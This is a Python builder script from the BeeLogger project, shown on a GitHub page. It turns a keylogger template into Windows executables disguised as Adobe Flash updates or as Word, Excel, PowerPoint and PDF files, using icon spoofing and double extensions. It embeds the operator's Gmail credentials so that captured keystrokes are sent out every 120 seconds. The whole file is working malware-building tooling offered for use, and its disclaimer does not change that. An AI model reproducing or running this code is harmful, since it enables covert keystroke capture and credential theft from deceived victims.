-
Notifications
You must be signed in to change notification settings - Fork 328
/
bee.py
162 lines (154 loc) · 8 KB
/
bee.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2017 BeeLogger
# Written by: * Alisson Moretto - 4w4k3
# https://github.com/4w4k3/BeeLogger
# Licensed under the BSD-3-Clause
import os
import sys
import time
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
if not os.geteuid() == 0:
sys.exit('BeeLogger must be run as root')
def clear():
os.system('clear')
def begin():
os.system('sudo rm -Rf dist')
# TEMPORARY UNAVAILABLE # print "\n{0}You can see a list with servers and ports in SERVERS.txt on BeeLogger folder.{1}".format(GREEN,END)
email = raw_input('Type your gmail to receive logs: ')
epass = raw_input('Type your gmail password: ')
print '\n'
print '[ * * * * * * * * * * * * * * * * * * * * * * * * * ]'
print '\n email: ' + email
print ' password: ' + epass
print '\n[ * * * * * * * * * * * * * * * * * * * * * * * * * ]'
print '\n'
ask = raw_input('These info above are correct? (y/n) :')
if ask == 'y':
pass
else:
begin()
template = open('Templates/Bee.py', 'r')
o = template.read()
payload = '#/usr/bin/python\n'
payload += '# -*- coding: utf-8 -*-\n'
payload += 'EEMAIL = ' + "'" + email + "'" + '\n'
payload += 'EPASS = ' + "'" + epass + "'" + '\n'
payload += str(o)
with open('k.py', 'w') as f:
f.write(payload)
f.close()
template.close()
def warn():
sys.stdout.write(YELLOW + '''
\ /
\ o ^ o / TO STOP SEND LOGS JUST
\ ( ) / DISABLE IT ON
____________(%%%%%%%)____________ TARGET IN MSCONFIG !
( / / )%%%%%%%( \ \ )
(___/___/__/ \__\___\___) https://github.com/4w4k3/BeeLogger
( / / (%%%%%%) \ \ )
(__/___/ (%%%%) \___\__)
''' + RED + ''' [ Disclaimer Alert ]''' + YELLOW + '''
''' + WHITE + ''' Not Responsible For Misuse ''' + YELLOW + '''
''' + WHITE + ''' or Illegal Purposes.''' + YELLOW + '''
''' + WHITE + ''' Use it just for''' + RED + ''' WORK''' + WHITE + ''' or ''' + RED + '''EDUCATIONAL''' + WHITE + ''' !
''')
def heading():
os.system('clear')
sys.stdout.write(YELLOW + '''
.' '. I BEE YOU __
. . . \(__\_/ Version: 2.3
. . . -{{#(|8)
' . . ' ' . . ' /(__/ \ by:''' + WHITE + ' Alisson Moretto (' + YELLOW + '4w4k3' + WHITE + ')' + '\n' + '\n' + END)
print ' {0}[{1}K{0}]{1} Generate Keylogger {0}[{1}U{0}]{1} Update {0}[{1}Q{0}]{1} Quit '.format(YELLOW, WHITE) + '\n'
def pp():
sys.stdout.write(GREEN + '''Thank You for using Bee, Think Great, Fly High! \n''' + END)
def option():
print ' {0}[{1}1{0}]{1} Adobe Flash Update '.format(BLUE, WHITE) + '\n' + ' {0}[{1}2{0}]{1} Fake Word docx '.format(BLUE, WHITE) + '\n' + ' {0}[{1}3{0}]{1} Fake Excel xlsx '.format(BLUE, WHITE) + '\n' + ' {0}[{1}4{0}]{1} Fᴀᴋᴇ Powerpoint pptx '.format(BLUE, WHITE) + '\n' + ' {0}[{1}5{0}]{1} Fake Acrobat pdf '.format(BLUE, WHITE) + '\n' + ' {0}[{1}6{0}]{1} Blank Executable '.format(BLUE, WHITE)
def main():
clear()
warn()
raw_input('\nPRESS [ENTER] TO CONTINUE')
clear()
heading()
try:
while True:
header = ('{0}Bee{1} > {2}'.format(YELLOW, WHITE, END))
choice = raw_input(header)
if choice.upper() == 'Q' or choice.upper() == 'QUIT':
clear()
pp()
raise SystemExit
if choice.upper() == 'K':
option()
print '\n {0}WARNING: Enable access to less secure apps on your email account.{2} \n -> * ONLY WORK WITH GMAIL * :\n {1}https://www.google.com/settings/security/lesssecureapps{2}'.format(RED, GREEN, END)
print '\n NOTE: Don\'t use your personal email, make a dedicated.'
print '\n {0}This keylogger send logs when logs > 50 chars or each 120 seconds.{1}'.format(BLUE, END)
if choice.upper() == '6':
begin()
os.system('wine /root/.wine/drive_c/Python27/python.exe /root/.wine/drive_c/Python27/Scripts/pyinstaller-script.py --noconfirm --noconsole -m Manifest/manifest.manifest -F k.py')
os.system('rm -Rf build k.spec k.py')
name = 'Bee.exe'
os.rename('dist/k.exe', 'dist/' + name)
clear()
heading()
os.system('sudo rm -Rf Templates/k_enc.py')
print '\n {0}[*] Saved to: {1}'.format(GREEN, END) + 'dist/' + name
if choice == '1':
begin()
os.system('wine /root/.wine/drive_c/Python27/python.exe /root/.wine/drive_c/Python27/Scripts/pyinstaller-script.py --noconsole -m Manifest/manifest.manifest --version-file=Resource/adobe.Bee -i Icons/flash.ico -F k.py')
os.system('rm -Rf build k.spec k.py')
name = 'Bee_Flash_.exe'
os.rename('dist/k.exe', 'dist/' + name)
clear()
heading()
print '{0}[*] Saved to: {1}'.format(GREEN, END) + 'dist/' + name
elif choice == '2':
begin()
os.system('wine /root/.wine/drive_c/Python27/python.exe /root/.wine/drive_c/Python27/Scripts/pyinstaller-script.py --noconsole -m Manifest/manifest.manifest --version-file=Resource/word.Bee -i Icons/word.ico -F k.py')
os.system('rm -Rf build k.spec k.py')
name = 'Bee_Word_.docx.exe'
os.rename('dist/k.exe', 'dist/' + name)
clear()
heading()
print '{0}[*] Saved to: {1}'.format(GREEN, END) + 'dist/' + name
elif choice == '3':
begin()
os.system('wine /root/.wine/drive_c/Python27/python.exe /root/.wine/drive_c/Python27/Scripts/pyinstaller-script.py --noconsole -m Manifest/manifest.manifest --version-file=Resource/excel.Bee -i Icons/excel.ico -F k.py')
os.system('rm -Rf build k.spec k.py')
name = 'Bee_Excel_.xlsx.exe'
os.rename('dist/k.exe', 'dist/' + name)
clear()
heading()
print '{0}[*] Saved to: {1}'.format(GREEN, END) + 'dist/' + name
elif choice == '4':
begin()
os.system('wine /root/.wine/drive_c/Python27/python.exe /root/.wine/drive_c/Python27/Scripts/pyinstaller-script.py --noconsole -m Manifest/manifest.manifest --version-file=Resource/powerpoint.Bee -i Icons/powerpoint.ico -F k.py')
os.system('rm -Rf build k.spec k.py')
name = 'Bee_Power_.pptx.exe'
os.rename('dist/k.exe', 'dist/' + name)
clear()
heading()
print '{0}[*] Saved to: {1}'.format(GREEN, END) + 'dist/' + name
elif choice == '5':
begin()
os.system('wine /root/.wine/drive_c/Python27/python.exe /root/.wine/drive_c/Python27/Scripts/pyinstaller-script.py --noconsole -m Manifest/manifest.manifest --version-file=Resource/acrobat.Bee -i Icons/acrobat.ico -F k.py')
os.system('rm -Rf build k.spec k.py')
name = 'Bee_AcrobatPDF_.pdf.exe'
os.rename('dist/k.exe', 'dist/' + name)
clear()
heading()
print '{0}[*] Saved to: {1}'.format(GREEN, END) + 'dist/' + name
if choice.upper() == 'U' or choice.upper() == 'UPDATE':
os.system('python2.7 updater.py')
if choice.upper() == 'EXIT' or choice.upper() == 'CLOSE':
clear()
pp()
raise SystemExit
except KeyboardInterrupt:
clear()
pp()
sys.exit(0)
if __name__ == '__main__':
main()